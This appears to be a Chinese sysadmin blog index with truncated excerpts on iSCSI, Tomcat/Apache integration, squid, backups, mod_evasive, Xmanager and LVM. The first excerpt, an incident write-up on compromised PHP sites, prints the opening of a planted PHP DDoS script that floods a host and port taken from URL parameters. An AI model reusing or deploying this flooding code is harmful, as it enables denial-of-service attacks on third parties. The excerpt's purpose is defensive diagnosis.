PHP环境（IIS/apache）对外发包的解决方法 前段时间有一些用户的带宽经常跑满，防火墙查看是在向外发包，决定一查究竟。开始以为是系统中毒，但是查毒之后并没有什么异常。后来发现IIS/apache服务停掉之后，就恢复了。于是开始从web服务方面查找原因，最后确认是PHP网站代码被篡改，植入DDOS攻击代码。在网上搜索到了一段PHP-DDOS代码：<?php   set_time_limit(999999);   $host = $_GET['host'];   $port = $_GET['port'];   $exec_time = $_GET['time'];   $Sendlen = 65535;   $packets = 0;   ignore_user_abort(True);   if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){           if (StrLen($_GET['rat'])<>0){                   echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".G...

Centos6.2安装和配置ISCSI服务和客户端 快速增长的存储容量使得企业需要采用网络存储解决方案。目前网络存储技术采用的连接技术主要有光纤通道和TCP／IP。基于IP的网络存储能解决基于光纤 通道的网络存储中存在的兼容性和传输距离问题，而且能提供相对廉价的解决方案。iSCSI协议是IP存储网络协议之一，它将广泛应用的两种工业标准 SCSI和TCP／IP结合起来，为存储设备提供面向数据块级的连接服务。iSCSI（互联网小型计算机系统接口）是一种在TCP/IP上进行数据块传输的标准。它是由Cisco和IBM两家发起的，并且得到了各大存储厂商的大力支持。iSCSI可以实现在IP网络上运行SCSI协议，使其能够在诸如高速千兆以太网上进行快速的数据存取备份操作。iSCSI存储分为服务器端（targets）和客户端（initiators），客户端发送SCSI命令到远程的存储设备端（服务器端），iSCSI使用的是TCP/IP协议，默认使用TCP的3260端口。客户端：-通过discovery程序来请求远程的块设备；-客户端必须安装了iscsi设备驱动器；-要安装iscsi-initiator-utils-*.rpm软件包；服务器端：-发布一个或多个块设备给initiator访问；-从RHEL5.3以后开始支持iSCSI；-需要安装scsi-target-utils-*.rpm软件包；对于每...

利用JK连接Apache与Tomcat，实现负载均衡 整合 Apache Http Server 和 Tomcat 可以提升对静态文件的处理性能、利用 Web 服务器来做负载均衡以及容错、无缝的升级应用程序。首先我们先介绍一下为什么要让 Apache 与 Tomcat 之间进行连接。事实上 Tomcat 本身已经提供了 HTTP 服务，该服务默认的端口是 8080，装好 tomcat 后通过 8080 端口可以直接使用 Tomcat 所运行的应用程序，你也可以将该端口改为 80。既然 Tomcat 本身已经可以提供这样的服务，我们为什么还要引入 Apache 或者其他的一些专门的 HTTP 服务器呢？原因有下面几个：1. 提升对静态文件的处理性能2. 利用 Web 服务器来做负载均衡以及容错3. 无缝的升级应用程序这三点对一个 web 网站来说是非常之重要的，我们希望我们的网站不仅是速度快，而且要稳定，不能因为某个 Tomcat 宕机或者是升级程序导致用户访问不了，而能完成这几个功能的、最好的HTTP服务器也就只有 apache 的 http server 了，它跟 tomcat 的结合是最紧密和可靠的。JK是最常用的Apache与Tomcat的连接方式，最新版本是JK-1.2.37 released，JK 是通过 AJP 协议与 Tomcat 服务器进行通讯的，Tomcat 默认的 AJP Connector 的端口是 8009。JK 本身...

配置squid 反向代理提高网站性能 本文旨在介绍 squid 反向代理的工作原理的基础上，指出反向代理技术在提高网站访问速度，增强网站可用性、安全性方面有很好的用途。现在有许多大型的门户网站都采用 squid 反向代理技术来加速网站的访问速度，可将不同的URL请求分发到后台不同的 WEB 服务器上，同时互联网用户只能看到反向代理服务器的地址，加强了网站的访问安全。本文在具体的实验环境下，利用 DNS 轮询和 Squid 反向代理技术，实现了网站的负载均衡，从而提高了网站的可用性和可靠性。1、什么是反向代理？反向代理服务器又称为 WEB 加速服务器，它位于 WEB 服务器的前端，充当 WEB 服务器的内容缓存器。反向代理服务器是针对 WEB 服务器设置的，后台 WEB 服务器对互联网用户是透明的，用户只能看到反向代理服务器的地址，不清楚后台 WEB 服务器是如何组织架构的。当互联网用户请求 WEB 服务时，DNS 将请求的域名解析为反向代理服务器的 IP 地址，这样 URL 请求将被发送到反向代理服务器，由反向代理服务器负责处理用户的请求与应答、与后台 WEB 服务器交互。利用反向代理服务器减轻了后台 WEB 服务器的负载，提高了访问速度，同时避免了因用户直接与 WEB 服务器通信带...

Linux系统备份与恢复 Linux不像windows,它不限制根用户存取任何东西，因此，你完全可以把一个分区上每一个的文件放入一个TAR文件中。使用root用户切换到根目录然后，使用下面的命令备份完整的系统：tar cvpzf backup.tgz / --exclude=/proc --exclude=/lost+found --exclude=/backup.tgz --exclude=/mnt --exclude=/sys说明：tar 部分就是我们将要使用的软件。'cvpfz'是我们给tar加的选项，像“创建一个压缩文档”（这是显然的），“保存权限”（以便使每一个相同的文件有相同的权限），以及“gzip”（缩减大小）。接下来，是压缩文档将获得的名称，在我们的例子中是backup.tgz。紧随其后的是我们想要备份的根目录。既然我们想备份所有东西：/。接着就是我们要剔除的目录了：我们不想备份每一样东西，因为包括有些目录不是非常有用。同时确保你没有把备份文件本身也加进去了，否则，你会得到怪异的结 果的。你也许同样不打算把/mnt文件夹包括进来——如果你在那儿挂载了其他分区——否则最终你会把那些也备份的。同时确保你没有任何东西挂载在 /media(即没有挂载任何cd或可移动介质）。否则，剔除/media。在进程的最后，你也许会得到一条信息，写着“tar：由于先前错误的...

Apache如何防止DDOS攻击—mod_evasive模块的配置 目前的网络攻击多种多样，什么CC，DDOS，碎片，死亡ping等等，但是最头疼的就是DDOS了。大多数网站都是使用使用Apache的httpd服务作为服务端的，可以在apache中加载mod_evasive模块来防止DDOS攻击。本文将介绍如何在apche中配置mod_evasive模块。1.mod_evasive 介绍mod_evasive 是Apache（httpd)服务器的防DDOS的一个模块。对于WEB服务器来说，是目前比较好的一个防护DDOS攻击的扩展模块。虽然并不能完全防御 DDOS攻击，但在一定条件下，还是起到缓服Apache（httpd)服务器的压力。如配合iptables、硬件防火墙等防火墙设备配合使用，可能有 更好的效果。mod_evasive 的官方地址： http://www.zdziarski.com2、源码安装mod_evasive[root@Centos6 ~] # wget http://www.zdziarski.com/blog/wp-content/uploads/2010/02/mod_evasive_1.10.1.tar.gz [root@Centos6 ~] # tar xzvf mod_evasive_1.10.1.tar.gz [root@Centos6 ~] # cd mod_evasive [root@Centos6 ~] # /usr/local/apache/bin/apxs -i -a -c mod_evasive20.c3、修改httpd.conf，关于mod_evasive的相关参数<IfModule mod_evasive20.c>   &n...

Xmanager 远程连接Linux桌面 我们知道类UNIX操作系统也是支持远程桌面的，用的基本都是VNC服务，使用过VNC的朋友都知道，它的远程连接的显示效果不是很好，经常出现花屏等现象，本文我介绍一个更好的连接远程桌面的工具--Xmanager。Xmanager，可以将PC变成X Windows工作站（非开源）。Xmanager是Windows 95/98/ME和Windows NT/2000/XP /2003/windows7/windows8平台下一个性能优秀的X11 PC X服务器。就像运行在PC上的任何Windows应用程序一样，它可以无缝拼接到UNIX 应用程序中。在UNIX/Linux和Windows网络环境中，Xmanager 是最好的连通解决方案。Xmanager 是一个完整的网络连接套件，可以连接的协议包括SSH、telnet、ftp、stfp等，它支持3D加速技术、PC X server, OpenGL (GLX)、文件传输和LPD打印服务器。更多的介绍就不说了，英文好的可以参考官网：http://www.netsarang.com下面介绍使用Xmanager 连接Linux （Centos6.3）的远程桌面的几种方法。一、在内网使用Xmanager监控Linux的存活，并可以远程连接桌面(XDMCP)Xmanager默认使用广播自动发现可以连接的远程主机，利用这一特性可以在内网监控服务器的存活并自动建立到远程桌面的连接。远程主机配置：Linux主机安装...

Centos6.2系统LVM的创建与管理（二） 上文中为大家演示了如何创建LVM，下面讲解LVM的一些管理操作，包括LVM的缩减、增加、删除以及快照等。依然以前文中的虚拟机环境为大家演示在Centos6.2（与red hat enterprise linux 6.2 内核版本号相同）。大多数的linux爱好者都喜欢在命令行下工作，尽管Centos6.2的图形程序已经很成熟，并且也比之前版本稳定的多，但我们还是相信命令行，下面开始：先看下我们前文中创建的LVM：[root@linux ~]# vgdisplay --- Volume group --- VG Name               VG123 System ID Format                lvm2 Metadata Areas        3 Metadata Sequence No  3 VG Access             read/write VG Status             resizable MAX LV         &nb...

Centos6.2系统下LVM的创建与管理 实验内容仍然以安装了Centos6.2的vmware虚拟机为环境，使用的安装盘为前面我定制的CentOS6.2进行的安装，不到10分钟就安装完成了，并添加了4个3G的虚拟磁盘，过程不必细说，直接进入正题。本文主要说明如何创建LVM，从创建的过程可以清楚的理解，PE、PV、VG、LV之间的关系1.确认LVM2工具正确安装[root@linux ~]# yum info lvm2 Installed Packages Name        : lvm2 Arch        : i686 Version     : 2.02.87 Release     : 6.el6 Size        : 1.2 M Repo        : installed From repo   : anaconda-CentOS-201112130233.i386 Summary     : Userland logical volume management tools URL         : http://sources.redhat.com/lvm2 License     : GPLv2 Description : LVM2 includes all of the support for handling read...

LVM 扩展root空间大小虚拟机上搭建Centos6.3系统,默认虚拟机分了20G,自动使用LVM分区方式 。查看系统分区情况如下:P[root@localhost   ~]#  df -h文件系 统                           1K-块              已用         可用          已用%  挂载点 /dev/mapper/VolGroup00-LogVol00                                        2920216      2479008        290476    90%  / /dev/sda1                          101086          11785         84082    13%  /boot tmpfs               ...